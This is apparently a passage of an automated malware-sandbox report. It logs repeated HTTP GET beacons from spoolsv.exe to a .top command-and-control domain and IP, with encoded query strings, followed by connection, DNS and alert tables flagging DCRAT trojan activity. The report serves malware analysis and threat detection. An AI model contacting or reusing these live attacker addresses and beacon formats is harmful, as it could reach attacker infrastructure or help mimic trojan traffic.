ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI5ETNhNGZjBzY0E2Y2QWYwIWM0EDZ0EDM2MWY0MWZwEGNjZTYlNGZjJiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
2.13 Kb
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
2292
spoolsv.exe
GET
200
94.142.138.11:80
http://686084.clmonth.nyashteam.top/Jsprivate.php?DaQkNjbB6QwgKC=oZUpB9RidfdRjvI7lFc7N4hi3m&2882a3c16990bf1798eac9f569a208f8=AZzcTZ1cTMkRjN4MGOmVGMlVTYjVmYhRTM1kTZlFGZxY2M0YTYwEGZ3cDMxUjMwQzMxQDNygjN&c046c2ee8690509603eb62347da0996c=AMjhjY0EzMxIGM3ImM3MjM5EzN1kzY4UTNmVDMjNGMyMGZiRGZwcTN&18fb8b8940d0c16b5368d63ec574ee70=d1nI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W&a8a48074824fd3590e8bb0226bd0afb5=0VfiIiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiI2cDOmdDOiRmY3MjYjNDNwEmZ4YzMllDNxQGZ2YGZmZjZ2ETYzUDN2IiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUOtWSzl0ULVHZzIWd01mYWh2QJVHZzIWd01mYWpUaPlWVXJGa1UlVRR2aJNXSTdVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMTM1Y2YjljN0EzM0QDN2MDMxQ2MiVjNzM2Y2MjM4QWNiwiIxgzNyEGZ4MDMygzYmhDMhNTYiRTOlBzYmNjMmZjY0QzN0UWZ3kzMxIiOiUGM1QjZ1MTNjNDZwImM2UjZklDOwYTZ0UWM1ImN0AzYiwiI4QzNiZGNyIDOkZmZwgjMkBTYlZDM5cDZ0UzNiRDM5cDMkZmZwcjM5IiOikDM4EGN1IGZ0I2MjFTY3YmNxYjY2IWZmJGNyUDN1gzMis3W
RU
text
104 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2292
spoolsv.exe
94.142.138.11:80
686084.clmonth.nyashteam.top
Network Management Ltd
RU
malicious
94.142.138.11:80
686084.clmonth.nyashteam.top
Network Management Ltd
RU
malicious

DNS requests

Domain
IP
Reputation
686084.clmonth.nyashteam.top
  • 94.142.138.11
malicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2292
spoolsv.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
2292
spoolsv.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2292
spoolsv.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2292
spoolsv.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2292
spoolsv.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2 ETPRO signatures available at the full report
No debug info